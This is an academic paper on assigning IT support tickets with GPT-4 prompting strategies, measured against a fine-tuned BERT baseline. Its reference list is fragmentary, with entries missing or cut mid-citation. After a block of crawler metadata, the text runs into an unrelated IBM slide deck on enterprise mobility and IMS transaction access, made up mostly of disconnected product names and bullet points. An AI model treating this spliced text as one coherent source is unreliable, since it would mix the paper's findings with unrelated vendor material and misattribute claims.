Modern companies which supply IT solutions not only have to provide an effective software environment, but also need to maintain it during the software lifecycle, to fix errors and malfunctions, to introduce new functionalities and to satisfy the requests submitted by the users. This task is usually done by programmers specialized in maintenance tasks who need to take care of new issues every day. Such issues are usually submitted through ticketing systems. In these systems, the users can write a brief report that describes a problem they encountered, or a specific service they need. These reports, typically called tickets, are then distributed among the maintenance specialists who have to satisfy the users’ requests.

However, in large companies which provide complex IT solutions or more than one product, different employees devoted to maintenance can have different expertise. Therefore, there is the need to assign a ticket to the right person, i.e. an employee who has the necessary technical skills to solve the raised issue. In order to do that, typically one or more human employees have to read the ticket, understand the request and assign it to a technician. Since this task is quite time-consuming, bigger companies are starting to implement automatic solutions. Although these solutions can be based on ad hoc algorithms [2, 3] or on fine-tuning generic pre-trained language models [4] such as BERT [5], they require a considerable amount of training data and an expensive effort (by programmers and machine learning specialists) to implement. On the other hand, the outstanding results obtained by pre-trained large language models (LLMs) as few-shot learners (i.e.
with a minimal number of training examples) [6, 7, 8] could make automatic ticket assignment available to many companies without any particular effort.

In order to verify whether that is achievable, in this work we investigate how these models can be applied to a real-world scenario: the assignment of the tickets received by the Italian company Mega Italia Media\(^1\), which provides IT solutions in the e-learning sector for occupational safety. In particular, in 2011 they released the DynDevice Learning Management System (LMS), facilitating companies in standard corporate training, allowing them to create specific courses, to manage final exams [9, 10] (also providing the related certificates if the exam has been passed) and the interaction with the users [11]. The company receives many tickets related to this platform, which has to be maintained and updated constantly in order to satisfy the users’ needs.

Using these tickets, we verify the performance of OpenAI GPT-4 [12], a state-of-the-art pre-trained LLM based on the Transformer architecture [13], on this task. However, it has been noted that the performance of such models can vary significantly depending on how the requested task is formulated or, in more technical terms, on which prompt is used [14, 15]. Therefore, we study different configurations and prompts in which more or less information is available to the LLM, and different numbers of provided examples. We compare these results with a baseline in which a BERT model is fine-tuned on this task with 1000 labeled tickets.

The rest of the paper is organized as follows. In Section 2, we provide the background and an overview of the state of the art and related works. In Section 3, we describe the dataset of our application. In Section 4, we describe our approaches for solving the automatic ticket assignment task, which are evaluated and discussed in Section 5. Finally, in Section 6 we propose some conclusions and future developments. The code and the datasets can be found on GitHub\(^3\).

2. Related work

In recent years, several researchers have approached the support ticket domain, solving problems such as ticket categorization [2, 4, 16], ticket assignment and ticket resolution [17]; our work falls in the second category. In 2018, Uber, the famous private car transport company, proposed COTA [18] (Customer Obsession Ticket Assistant), a framework to take care of customer issues. They proposed two versions of their system: the first one combines several features, such as user information, trip information and ticket metadata, with a Random Forest algorithm for predicting the correct operator of each ticket; the second version leverages an Encoder-Combiner-Decoder approach, based on CNNs and RNNs over different types of features (categorical, numerical, binary and text features) and a multi-class classification layer. A similar approach was developed by DeLucia and Moore [19]: the authors implemented a Random Forest model fed with features created with latent Dirichlet allocation topic modeling, latent semantic analysis and Doc2Vec [20], starting from the ticket subject and message. Han and Sun [21] proposed DeepRouting in 2020, an intelligent system for assigning tickets to operators in an expert network.

\(^1\)https://www.megaitaliamedia.com/en/
\(^3\)https://github.com/nicolarici/AI-TS
It contains two modules: one for text matching, based on a convolutional neural network trained over tri-grams derived from the ticket description, and one for graph matching, based on a Graph Convolutional Network fed with the experts graph. With Feng et al. [22], in 2021 Apple developed its own ticket assignment system, TaDaa (Ticket Assignment Deep learning Auto Advisor). This system is based on the state-of-the-art Transformer architecture, in particular a pre-trained BERT model fine-tuned to solve two classification tasks. The model has two different classifiers: the first one assigns the ticket to one of the 3000 groups, and the second one identifies the expert (belonging to that group) who is going to solve the issue. We use a similar idea, in our much simpler context, with the BERT baseline described in Section 5. However, in this paper we show that, even with a limited number of examples, pre-trained LLMs can achieve similar performance.

Differently from these works, which are based on custom algorithms and models (and therefore require a considerable effort for designing, implementing and testing), in our work we verify whether pre-trained LLMs can be used for this kind of task, even without fine-tuning. More generally, we exploit prompt engineering, which was designed precisely for obtaining the best results from these pre-trained models. Regarding this line of work, White et al. [23] provide a pattern catalog for solving common problems when conversing with an LLM. They propose 17 patterns which allow users to better handle: the input given to the model; the output structure and format; possible errors in content, i.e. invented answers based on unverified facts; the prompt itself and how it can be improved to receive better responses; and the interaction between the user and the model, including the context needed by the model to generate a better response. Moreover, Reynolds et al. [24] showed that zero-shot learning (i.e. without any example provided to the model) with a good prompt can outperform a standard few-shot approach (i.e. with some examples); to do so, they introduced the concept of the meta-prompt, which seeds the model to generate its own natural language prompt to solve the task. A similar result was achieved by Zhou et al. [25], where the authors propose Automatic Prompt Engineer, a framework for automatic instruction generation and selection. In their method, the authors optimize the prompt by searching over a pool of instruction candidates proposed by an LLM in order to maximize a chosen score function.

LLMs, and in particular ChatGPT, have proven very effective in solving specific NLP tasks in general domains. Even in specific domains, such as public health [26, 27, 28], environmental problems [29] or legal rulings and laws [30, 31], LLMs achieve acceptable performance. To the best of our knowledge, there are currently no applications of GPT-based models in the context of workplace safety.

3. Available data

Since the release of DynDevice in 2011, Mega Italia Media has faced the problem of assisting and supporting end users. Originally, this service was provided by phone calls or emails but, with the strong spread of the platform over the years, these channels soon became saturated. To help the company operators solve the users’ problems, in 2013 the company developed a ticketing system; this new feature allowed the company to keep track of all the opened tickets, recording the status of each user’s request and who was in charge of solving the problem.
Moreover, this system kept a record of all the conversations between users and operators. Overall, the company has received more than 10000 tickets in the last 10 years. However, in the last period several new features and services (such as multiple interface changes, a videocall system and several AI applications) were introduced; therefore, we decided to consider in our dataset only the tickets received in the last months, which are about 1300. Furthermore, to build our dataset we decided to keep only the significant information: the ticket category, subject and description, and the area which solved the ticket; other information such as dates and identifiers has been removed. In the following we provide an example of a ticket; please note that this example has been translated, since all our tickets are written in Italian.

Example 1.
CATEGORY: G. More on e-Learning/training solutions
SUBJECT: Certificate with exam in presence HTML5
DESCRIPTION: “Certificate with Examination in Attendance” I turned it into HTML 5. Everything is fine except for the column rows that do not appear. What could be the problem? Thank you
AREA: SW

**Figure 1:** Cross table between ticket categories and the macro areas in charge of solving the tickets.

The category field contains one of the 11 predetermined categories decided by the company. The complete category list is reported in Figure 1. The subject and the description are text fields that require slight pre-processing in order to remove HTML tags, URLs and other special characters that can harm the classification process. Each ticket is assigned to a specific operator who is in charge of solving the raised issue. However, all the operators can be aggregated into three main macro areas:

- **eLEARNING**: handles the problems on the courses provided to the end users;
- **TECH**: solves the technical issues about the platform;
- **SW**: removes bugs and other software issues.

Each area manager assigns the ticket to a single operator suited to handle the case. In the left part of Figure 2, we report the ticket distribution among the macro areas; as we can see, the three classes are approximately equally distributed. On the contrary, as shown in the right part of Figure 2, the categories follow an unbalanced distribution, with category G being by far the most frequent, with more than 300 tickets. Another statistic that we extract from the dataset is the cross tabulation between the category and area fields. As we can see in Figure 1, there is a strong correlation between some categories and some areas: category A has a strong correlation with the eLEARNING area (and vice versa), whereas both TECH and SW have a strong correlation with category G. We expect tickets in these categories to be best assigned with a well-constructed prompt containing this information. Other categories do not present any correlation, in some cases due to the low number of tickets, such as categories N and H; in other cases (such as categories F and E) the tickets are equally distributed among all the areas. Finally, we sampled with stratification, following the area distribution, approximately 250 tickets to build 5 different test sets; this way, each test set contains 18 tickets for eLEARNING, 15 tickets for TECH and 14 tickets for SW.
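As an illustration of the light pre-processing step mentioned above, the following Python sketch (ours; the paper does not spell out the exact cleaning rules) removes HTML tags, URLs and other special characters from a ticket's subject or description:

```python
import re

def clean_ticket_text(text: str) -> str:
    """Strip HTML tags, URLs and special characters from ticket text."""
    text = re.sub(r"<[^>]+>", " ", text)        # drop HTML tags
    text = re.sub(r"https?://\S+", " ", text)   # drop URLs
    text = re.sub(r"[^\w\s.,?!'-]", " ", text)  # drop other special characters
    return re.sub(r"\s+", " ", text).strip()    # normalize whitespace

raw = "<p>Certificate with exam in presence</p> see https://example.com"
print(clean_ticket_text(raw))  # Certificate with exam in presence see
```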
The tickets sampled with this strategy also retain the category distribution and the cross correlation discussed above.

**Figure 2**: On the left, a histogram showing the ticket distribution by macro area (i.e. our classification labels). On the right, a histogram showing the ticket distribution for each category considered.

4. Prompts and methods for automatic ticket assignment

The base task to solve for automatic ticket assignment is a multi-class classification, in which we have to choose which group (eLEARNING, TECH or SW) will receive the ticket. To solve this task, we exploit the Python version of the OpenAI Chat Completion API\(^4\), which allows interaction with pre-trained LLMs. For each call, the API requires several parameters. The most relevant ones for our work are: the *model* we want to query, which in our case can be GPT-4 or GPT-3.5-turbo, and the *temperature*, a decimal number between 0.0 and 2.0 (default 1.0), which controls randomness (higher values) or determinism (lower values) in the generated response. To have as much determinism as possible, in all trials we set the temperature to 0.0. The corpus of the API request is composed of two messages: the *system prompt*, which contains the description of the task and the information needed to solve it, and the *user prompt*, i.e. the ticket to classify.

We tested GPT in three ways: zero-shot learning, few-shot learning, and ensemble learning. For the **zero-shot learning** scenario, we provided the model with insightful information in the system prompt and no examples; all the information was extracted from the database described in Section 3. These are the zero-shot prompts we implemented:

- **Baseline**: it describes the task, provides the basic information and instructs GPT to answer only with the macro area name. From here on, each subsequent prompt is to be considered concatenated with this one. Example: You are the manager of a service center whose task is to divide tickets between the various human operators. The available operators, contained in square brackets, are as follows: [eLEARNING, TECH, SW]. The tickets are divided into categories, listed by letters of the alphabet, contained in round brackets, which are as follows: (A. Problems in using a course, B. ...). Each ticket consists of a subject and a description. Your task is to assign the ticket to the most suitable operator, answering only with the operator’s name.
- **Human**: it contains insightful information, provided by a human employee, on the role of the three areas and the problems they solve. Example: SW handles technical problems with software code, new customisation and developments and ICT (Information and Communication Technologies) and SEO (Search Engine Optimisation) issues. The same information is provided for the other 2 areas.
- **Categories**: it contains information related to the assignment of the tickets aggregated by category. For each category, we extract the percentage of tickets belonging to that category that are solved by each area (which can be seen in Figure 1). For instance, for category A we wrote: Example: 66% of the tickets in the category “A. Problems in using a course” are assigned to eLEARNING, 24% to TECH and 11% to SW. The same information is provided for the other 10 categories.
- **Areas**: it contains information about the assignment of tickets aggregated by area. From Figure 1, for each area, we extract the percentage of tickets belonging to each category that is solved by the area.
For instance, for the area eLEARNING we have: Example: To eLEARNING is assigned 38% of the tickets in category A, 8% in B, 9% in C, 3% in D, 17% in E, 8% in F, 8% in G, 1% in H, 0% in I, 7% in M and 2% in N. The same information is provided for the other 2 areas.
- **Summaries**: for this prompt we asked GPT-4 to summarize the issues raised by the users in 10 tickets per area; these tickets were randomly sampled from the training dataset. For instance, for the area eLEARNING we have the following result: Example: eLEARNING solves problems related to the activation of courses, changes of certificates, platform access problems, cancellation of courses, issuing of certificates, downloading of certificates and approval of enrolment forms. The same summary is generated by GPT-4 for the other two areas and used in the system prompt. Please note that these summaries are generated separately by the model: at the moment of the ticket assignment, the LLM receives the summary without any knowledge of the 10 examples used for generating it.

As a second approach, we implemented **few-shot learning**. The basic idea is to give the model some examples of classification so it can understand the pattern, generalize it, and then apply what it has learned to the test instances. This approach has achieved outstanding results in many NLP tasks [6, 8]. All our few-shot approaches use the Baseline prompt, without additional information. Instead, we provide the model with some examples in the same format as Example 1, with the correct macro area assigned.

The last approach, **ensemble learning**, leverages the best results obtained in the previous trials in order to use all the information at our disposal. Thus, for each ticket, we make \( n \) calls to the OpenAI API with different prompts, keeping model and temperature unchanged. Each result is counted as a vote, with no specific weight assigned, and the ticket is assigned to the area with the most votes. In the event of a tie, the ticket is randomly assigned to one of the areas with the most votes. In our experimental evaluation we use ensembles made of **three** and **four** prompts.

5. Experimental results

In this section, we report the results of our experiments. For each trial, in Table 1 we report the mean and the standard deviation over the five test sets of two metrics: the accuracy and the macro F1 score, both ranging between 0.0 (the worst) and 1.0 (the best). In addition to the approaches described in the previous section, to provide a baseline for comparison with state-of-the-art approaches, we tested how a classical approach with BERT solves the task. Starting from a pre-trained Italian version of BERT available on HuggingFace\(^5\), we fine-tuned the model on this specific task on 907 samples for 20 epochs, and we took the best-performing model on a validation set made of 101 examples. To perform the classification, we add to BERT a simple feedforward layer with three neurons, preceded by a 0.1 dropout layer. In training we used the binary cross-entropy loss function and the AdamW optimizer, with the learning rate set to \( 2 \times 10^{-5} \), the weight decay to 0.01 and the batch size to 32. We fed this classification model with the pre-processed ticket text: the Only Ticket configuration in Table 1 uses the subject and description alone, while the Full configuration also includes the ticket category.

\(^4\)https://platform.openai.com/docs/api-reference/chat
\(^5\)dbmdz/bert-base-italian-uncased
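A minimal sketch of this BERT baseline in PyTorch with HuggingFace Transformers is shown below (our reconstruction from the details above; tokenization of the ticket text, the training loop over 20 epochs and the validation-based model selection are elided):

```python
import torch
import torch.nn as nn
from transformers import AutoModel, AutoTokenizer

class TicketClassifier(nn.Module):
    """BERT encoder + dropout(0.1) + a 3-neuron feedforward head."""

    def __init__(self, name="dbmdz/bert-base-italian-uncased", n_areas=3):
        super().__init__()
        self.bert = AutoModel.from_pretrained(name)
        self.dropout = nn.Dropout(0.1)
        self.head = nn.Linear(self.bert.config.hidden_size, n_areas)

    def forward(self, input_ids, attention_mask):
        out = self.bert(input_ids=input_ids, attention_mask=attention_mask)
        cls = out.last_hidden_state[:, 0]        # [CLS] token representation
        return self.head(self.dropout(cls))      # logits for eLEARNING/TECH/SW

tokenizer = AutoTokenizer.from_pretrained("dbmdz/bert-base-italian-uncased")
model = TicketClassifier()
optimizer = torch.optim.AdamW(model.parameters(), lr=2e-5, weight_decay=0.01)
# Training would iterate mini-batches of 32 tokenized tickets for up to
# 20 epochs, minimizing a cross-entropy-style loss over the three areas.
```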
<table>
<thead>
<tr>
<th>Approach</th>
<th>Prompt</th>
<th>Accuracy</th>
<th>Macro F1</th>
</tr>
</thead>
<tbody>
<tr><td>ZS</td><td>Baseline</td><td>0.34 ± 0.05</td><td>0.29 ± 0.05</td></tr>
<tr><td>ZS</td><td>Summaries</td><td>0.50 ± 0.07</td><td>0.48 ± 0.06</td></tr>
<tr><td>ZS</td><td>Categories</td><td>0.53 ± 0.06</td><td>0.49 ± 0.09</td></tr>
<tr><td>ZS</td><td>All Information</td><td>0.54 ± 0.05</td><td>0.49 ± 0.07</td></tr>
<tr><td>ZS</td><td>Areas</td><td>0.56 ± 0.03</td><td>0.50 ± 0.04</td></tr>
<tr><td>ZS</td><td>Human</td><td>0.57 ± 0.03</td><td>0.54 ± 0.04</td></tr>
<tr><td>FS</td><td>One Example</td><td>0.19 ± 0.05</td><td>0.14 ± 0.05</td></tr>
<tr><td>FS</td><td>Three Examples</td><td>0.44 ± 0.02</td><td>0.36 ± 0.04</td></tr>
<tr><td>FS</td><td>Five Examples</td><td>0.44 ± 0.05</td><td>0.34 ± 0.05</td></tr>
<tr><td>FS</td><td>Ten Examples</td><td>0.56 ± 0.04</td><td>0.51 ± 0.04</td></tr>
<tr><td>BERT</td><td>Only Ticket</td><td>0.62 ± 0.07</td><td>0.62 ± 0.07</td></tr>
<tr><td>BERT</td><td>Full</td><td>0.65 ± 0.07</td><td>0.65 ± 0.07</td></tr>
<tr><td>EL</td><td>Three Prompts</td><td>0.57 ± 0.05</td><td>0.52 ± 0.06</td></tr>
<tr><td>EL</td><td>Four Prompts</td><td>0.61 ± 0.05</td><td>0.55 ± 0.08</td></tr>
</tbody>
</table>

Table 1: Experimental results of our methods. In the Approach column, we specify whether we use a zero-shot approach (ZS), a few-shot approach (FS), a fine-tuned BERT (BERT) or an ensemble learning approach (EL). In the Prompt column, we specify the additional configuration of the approach (as described in Section 4). For both Accuracy and Macro F1 we report the mean ± the standard deviation calculated over five different test sets.

Regarding the zero-shot approach, as soon as we start adding information to the base prompt, the accuracy improves. The two trials that leverage the correlation between area and category reach an accuracy of 0.53 for the Categories prompt and 0.56 for the Areas prompt. The reason for this behavior could be the length of the prompts: the first of these prompts is, more or less, 200 tokens long, and some information is forgotten or ignored by the LLM. Also, in these two cases we provided only information about the categories and no information about the ticket descriptions. This information is contained in the other two prompts: the Human and Summaries prompts. With the former, the model reaches about 0.57 accuracy and a higher macro F1 score (0.54), with the lowest standard deviation. With the latter, the accuracy drops to 0.50 with a higher standard deviation (0.07), probably due to the fact that the summaries are obtained from only 10 tickets, and the accuracy changes depending on whether the tickets in the test set are more or less similar to those used for the summaries. When we pass all the information to the model, the performance is lower (0.54 accuracy), probably because the prompt reaches a critical length.

For the few-shot approaches, the results are not particularly good. The single-example case performs even worse than the baseline, with an accuracy of approximately 0.19. However, as can be seen from Table 1, increasing the number of examples improves the accuracy; with 3 and 5 examples, we reach 0.44 accuracy.
This is probably due to the fact that the tickets are very varied, and a small sample of them does not represent the totality of issues addressed by a macro area. Only with 10 examples do we reach 0.56 (with a standard deviation of 0.04), approximately the same result obtained by the zero-shot approaches.

The only approach that almost reaches the BERT baseline is ensemble learning. In this case, using the best single-information zero-shot trials, combined with a voting system, lifts the performance to 0.57 with three prompts (Human, Areas and Categories) and 0.61 with all four prompts; in these cases the standard deviation is lower w.r.t. the BERT baseline. Also, in these scenarios, we can use all the information described in the zero-shot approach without increasing the prompt length, unlike the full zero-shot case. Probably, with different tie-breaking strategies (perhaps based on prediction probabilities) even better performance could be achieved; unfortunately, at the moment the Chat Completion OpenAI API does not provide any probabilistic information.

The second experiment focused on comparing the performance of the two main GPT models made available by OpenAI: GPT-4 and its predecessor GPT-3.5. Although this is interesting from the researcher’s perspective, the comparison also has an economic motivation: according to the API pricing, invoking GPT-3.5 costs about 20 times less than invoking GPT-4. In this experiment, we keep the same prompts and the other hyperparameters, modifying just the model. As we can see in Figure 3, the difference in performance is noticeable. The best result obtained by GPT-3.5 is with the Categories prompt, with an accuracy of 0.50, less than 5 points lower than GPT-4; the Human prompt loses approximately 10 points, while the Summaries prompt drops 15 points. The worst result is obtained by the Areas prompt, with an accuracy of 0.37 and a drop of 20 points. This behavior is probably due to the long list of percentages for each single area, which can confuse the model. No difference was found in the standard deviations. An average loss of 6 accuracy points across the 3 best-performing prompts (thus excluding Areas) could still justify the cost of using GPT-4 over its older but cheaper counterpart.

6. Conclusions and Future work

In this work, we have shown an application of pre-trained Large Language Models to automatic ticket assignment, based on real-world data provided by Mega Italia Media, a company that provides IT solutions in the e-learning context. In particular, we analyzed how different prompts, with more or less information and examples, influence the performance on this task. The experimental evaluation shows that in our context the classical few-shot approach does not provide a considerable improvement. This is probably because a limited number of examples cannot capture the overall variety of tickets that the company receives. Instead, a zero-shot approach definitely improves the performance, since it considers more information related to the overall context of the application (for instance, a human description of the different classes or the percentage of instances belonging to each category). The best results are obtained by the ensemble methods involving three and four prompts. Their results almost reach those obtained by a BERT model specifically fine-tuned for this task. In contrast to BERT, which uses more than 1000 tickets between training and validation, this approach uses none.
This approach can certainly be more efficient in scenarios where only a small amount of data is available. As future work, we aim to study other prompting techniques, such as chain-of-thought prompting [32] or automatically generated prompts [15]. Moreover, we would like to explore the performance of other LLMs, especially open-source ones such as OpenAssistant, Dolly, GPT-J or GPT-NeoX. This could lead to a more detailed study, not only in terms of measuring the performance of each model, but also trying to understand what the models know about this field (which involves information technology, programming languages, e-learning, etc.), how this knowledge is stored in such models [33, 34], and focusing on their explainability, analysing the behaviour of the attention mechanisms [35, 36] and preventing unwanted or discriminatory behaviour [37].

References

[1] E. Bassignana, D. Brunato, M. Polignano, A. Ramponi, Preface to the Seventh Workshop on Natural Language for Artificial Intelligence (NL4AI), in: Proceedings of the Seventh Workshop on Natural Language for Artificial Intelligence (NL4AI 2023) co-located with the 22nd International Conference of the Italian Association for Artificial Intelligence (AI*IA 2023), 2023.
[28] T. Mehmood, A. E. Gerevini, A. Lavelli, I. Serina, Combining multi-task learning with transfer learning for biomedical named entity recognition, in: M. Cristani, C. Toro, C. Zanni-Merk, R. J. Howlett, L. C. Jain (Eds.), Knowledge-Based and Intelligent Information & Engineering Systems: Proceedings of the 24th International Conference KES-2020, Virtual Event, 2020.
[29] J.-J. Zhu, J. Jiang, M. Yang, Z. J. Ren, ChatGPT and environmental research, Environmental Science & Technology (2023).
[31] I. Chalkidis, M. Fergadiotis, P. Malakasiotis, N. Aletras, I. Androutsopoulos, LEGAL-BERT: the muppets straight out of law school, CoRR abs/2010.02559 (2020).
[33] L. Serina, L. Putelli, A. E. Gerevini, I. Serina, Synonyms, antonyms and factual knowledge in BERT heads, Future Internet 15 (2023) 230.
[34] D. Dai, L. Dong, Y. Hao, Z. Sui, B. Chang, F. Wei, Knowledge neurons in pretrained transformers, in: Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), ACL 2022, Dublin, Ireland, May 22-27, 2022, Association for Computational Linguistics, 2022, pp. 8493–8502.
[35] … on the extraction of drug-drug interactions, in: CLiC-it, volume 2481 of CEUR Workshop Proceedings.
[36] … attention for the classification of medical reports, in: XAI.it@AI*IA, volume 3277 of CEUR Workshop Proceedings.
[37] … in BERT with a weakly supervised approach, in: D. Nozza, L. C. Passaro, M. Polignano (Eds.), Proceedings of the Sixth Workshop on Natural Language for Artificial Intelligence (NL4AI 2022) co-located with the 21st International Conference of the Italian Association for Artificial Intelligence (AI*IA 2022), Udine, November 30th, 2022, volume 3287 of CEUR Workshop Proceedings.
{"Source-Url": "https://ceur-ws.org/Vol-3551/paper4.pdf", "len_cl100k_base": 6996, "olmocr-version": "0.1.50", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 31488, "total-output-tokens": 10561, "length": "2e12", "weborganizer": {"__label__adult": 0.0005321502685546875, "__label__art_design": 0.00109100341796875, "__label__crime_law": 0.0006742477416992188, "__label__education_jobs": 0.048065185546875, "__label__entertainment": 0.0004458427429199219, "__label__fashion_beauty": 0.00043392181396484375, "__label__finance_business": 0.00106048583984375, "__label__food_dining": 0.00061798095703125, "__label__games": 0.0012969970703125, "__label__hardware": 0.0012903213500976562, "__label__health": 0.0013294219970703125, "__label__history": 0.000644683837890625, "__label__home_hobbies": 0.00022840499877929688, "__label__industrial": 0.0009222030639648438, "__label__literature": 0.0021495819091796875, "__label__politics": 0.0006260871887207031, "__label__religion": 0.0007944107055664062, "__label__science_tech": 0.3818359375, "__label__social_life": 0.0004398822784423828, "__label__software": 0.053955078125, "__label__software_dev": 0.5, "__label__sports_fitness": 0.00037026405334472656, "__label__transportation": 0.0007872581481933594, "__label__travel": 0.0003333091735839844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38166, 0.06462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38166, 0.17244]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38166, 0.88158]], "google_gemma-3-12b-it_contains_pii": [[0, 2757, false], [2757, 6191, null], [6191, 9807, null], [9807, 11746, null], [11746, 14237, null], [14237, 17491, null], [17491, 20812, null], [20812, 23318, null], [23318, 25150, null], [25150, 28469, null], [28469, 31950, null], [31950, 35583, null], [35583, 38166, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2757, true], [2757, 6191, null], [6191, 9807, null], [9807, 11746, null], [11746, 14237, null], [14237, 17491, null], [17491, 20812, null], [20812, 23318, null], [23318, 25150, null], [25150, 28469, null], [28469, 31950, null], [31950, 35583, null], [35583, 38166, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38166, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38166, null]], "pdf_page_numbers": [[0, 2757, 1], [2757, 6191, 2], [6191, 9807, 3], [9807, 11746, 4], [11746, 14237, 5], [14237, 17491, 6], [17491, 20812, 7], [20812, 23318, 8], [23318, 25150, 9], [25150, 28469, 10], [28469, 31950, 11], [31950, 35583, 12], [35583, 38166, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38166, 0.09756]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
d6bf50e188880aedf0cb4d914ff86a566f79322b
Enterprise Mobility for IMS Access
Ken Blackman – kblackm@us.ibm.com IBM
Suzie Wendler – wendler@us.ibm.com IBM

Topics
- Enterprise Mobility
- The IBM Mobile Foundation
  - IBM Cast Iron
  - Worklight
- IMS Impact
  - Transactions
  - Databases

Mobile is a significant component of the evolution of computing. Mobile is different:
- Transformational business models
- Faster lifecycles / more iterative
- Requires closer alignment between stakeholders

Enterprise Mobility
- Evolving trends
  - 2011 – 850K Android activations per day; over 372M iOS devices sold, with 62M in Q4 alone
  - 2012 – shipment of smartphones and tablets was expected to exceed that of traditional personal computers, including laptops
  - 2013 – employee smartphones will account for 62% of business use; 8 out of 10 businesses will support tablet use in the workplace
  - …
  - 2016 – the estimate is that there will be 1 billion+ smartphones and 375 million+ tablets in the market
  - 2020 – the number of mobile devices worldwide will exceed 24 billion
- Expanding marketplace and explosive growth due to:
  - Increasing business requirements for enterprise mobile applications, or “apps”, for mobile device connectivity
  - Constant introduction of new capabilities that inspire new opportunities, e.g., global positioning system (GPS) functionality and cameras
  - Industry-wide recognition that businesses everywhere are now strategically deploying enterprise mobile apps to support business objectives

Enterprise Mobility (cont’d)
- Mobile devices provide new end points
  - Business to Enterprise – productivity tools for employees
  - Business to Consumer – customer engagement channels
  - Consumer to Consumer – transfer data to/from mobile devices

Enterprise Mobility
- Application types
  - Native mobile-only application
  - Mobile Web access application
  - Hybrid application – mobile-only + Web access

Enterprise Mobility (cont’d)
- The mobile lifecycle
  - Strong demand by lines of business
  - Higher expectations of user experience with mobile apps
  - Lack of best-practices guidance on how to deliver mobile applications
  - More direct involvement from users/stakeholders in design
  - Native programming models are not portable across devices
  - Highly fragmented set of mobile devices and platforms
  - Very large number of configurations of devices, platforms, carriers, etc. to test
  - Evolution at a much faster pace: more frequent releases and updates for apps, with more urgent time-to-market demands

Enterprise Mobility Challenges
- Changes to the business model
  - New business opportunities based upon geolocation
  - Anytime, anywhere business transactions
  - Importance of social business interactions
- Application development complexity
  - Multiple device platforms with a fragmented Web, native, and hybrid model landscape
  - Connecting to enterprise back-end services in a secure and scalable manner
  - Unique mobile requirements (UI, connected/disconnected use, version upgrades, etc.)
- Mobile security and management - Protection of privacy and confidential information - Use of client-owned smartphones and tablets - Visibility, Security & Management of mobile platform requirements Enterprise Mobility … • IBM solutions address these needs through architectures and product solutions that • Build and Connect • Build mobile applications that run on multiple devices • Connect to, and run enterprise back-end applications and information systems • Manage and Secure • Manage mobile devices and applications • Secure the mobile business environment • Extend and Transform • Extend existing business capabilities to mobile devices • Transform the business by creating new opportunities Access to IMS - What’s been available - IBM Mobile offerings - What’s new - IBM Mobile foundation - What’s coming - Requirement for enhanced support of mobile applications by implementing WAS Liberty Profile support with integrated REST endpoint, which will enable use of the lightweight data-interchange format JavaScript Object Notation (JSON) - Mobile application development - Target is IMS administration - Mobile enablement for IMS transactions and data Enterprise Mobility ... IBM Mobile Offerings WebSphere Portal Mobile Portal Accelerator Lotus Quickr Lotus Notes Traveler Lotus Sametime Lotus Connections Lotus Mobile Connect Mobile Portal Accelerator LotusLive meetings Lotus Expediter WebSphere Commerce Tivoli Maximo Everyplace Cognos Go! Mobile Cognos BI Cognos Now SPSS IBM Smart Analytics System Rational DOORS Rational Software Architect Rational Modeling communications Applications plugin for RSA Rational TeamConcert Rational SDL Suite Rhapsody Mobile Mashup WebSphere Application Server WebSphere sMashIMS connector WebSphere Presence Server WebSphere XDMS Server WebSphere Telecom Web Services Server Tivoli Network Performance Manager, Tivoli Netcool OMNibus & Network Manager, Tivoli Netcool/Impact, Tivoli Netcool Service Quality Manager Center, Tivoli Netcool Performance Flow Analyzer Tivoli Access Manager Tivoli Federated Identity Mgr Tivoli Security Info & Event Mgr Tivoli Monitoring Tivoli Business Service Mgmt Tivoli Composite Application Mgr Tivoli Service Automation Mgr Tivoli Usage and Acctg Mgr Tivoli Provisioning Manager WebSphere Dynamic Process Edition Telecom Content Pack Lombardi Blueprint Content Manager OnDemand Optim Data Growth Solution for Amdocs Mobile Enterprise Services Rational FocalPoint Rational System Architect Rational Software Architect Rational Modeling Comm Appl plugin for RSA Infosphere Business Glossary SPDE Rational Clear Case Intelliden R-Series DB2, Informix, solidDB Optim, Guardium InfoSphere Foundation Tools Telecom Data Warehouse InfoSphere MDM InfoSphere MDM for PIM ECM / FileNet InfoSphere Streams ILOG WebSphere Telecom Web Services Server Smart Business Dev & Test Cloud Smart Business Storage Cloud Smart Analytics Cloud IBM CloudBurst Enterprise Mobility … - IBM Mobile framework - Connectivity to back-end IMS resources - WebSphere Application Server solutions - *IMS TM Resource Adapter for transactions* - Full capability adapter (JCA connector) - IMS usage experience is mature - Supports connectivity to IMS Connect from any platform on which WAS can run - *IMS Universal Drivers* - Full access to IMS databases Enterprise Mobility … - WAS connectivity to back-end IMS transactions … - WebSphere Optimized Local Adapter (WOLA) - Useful when WAS and IMS are in the same LPAR - *High speed Local Comm function accessible by address spaces outside the WAS z/OS cell* 
